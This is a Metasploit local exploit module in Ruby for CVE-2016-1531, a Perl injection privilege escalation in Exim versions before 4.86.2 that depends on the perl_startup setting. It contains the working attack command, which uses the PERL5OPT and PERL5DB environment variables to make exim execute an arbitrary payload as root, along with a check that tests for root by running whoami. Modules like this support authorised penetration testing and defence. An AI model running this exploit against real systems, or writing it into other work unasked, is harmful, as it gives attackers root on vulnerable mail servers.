##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Exim "perl_startup" Privilege Escalation',
        'Description' => %q{
          This module exploits a Perl injection vulnerability in Exim < 4.86.2
          given the presence of the "perl_startup" configuration parameter.
        },
        'Author' => [
          'Dawid Golunski', # Vulnerability discovery
          'wvu' # Metasploit module
        ],
        'References' => [
          %w[CVE 2016-1531],
          %w[EDB 39549],
          %w[URL http://www.exim.org/static/doc/CVE-2016-1531.txt]
        ],
        'DisclosureDate' => '2016-03-10',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'SessionTypes' => %w[shell meterpreter],
        'Privileged' => true,
        'Payload' => {
          'BadChars' => "\x22\x27" # " and '
        },
        'Targets' => [
          ['Exim < 4.86.2', {}]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => []
        }
      )
    )
  end

  def check
    if exploit('whoami') == 'root'
      CheckCode::Vulnerable
    else
      CheckCode::Safe
    end
  end

  def exploit(cmd = payload.encoded)
    # PERL5DB technique from http://perldoc.perl.org/perlrun.html
    cmd_exec(%(PERL5OPT=-d PERL5DB='exec "#{cmd}"' exim -ps 2>&-))
  end
end
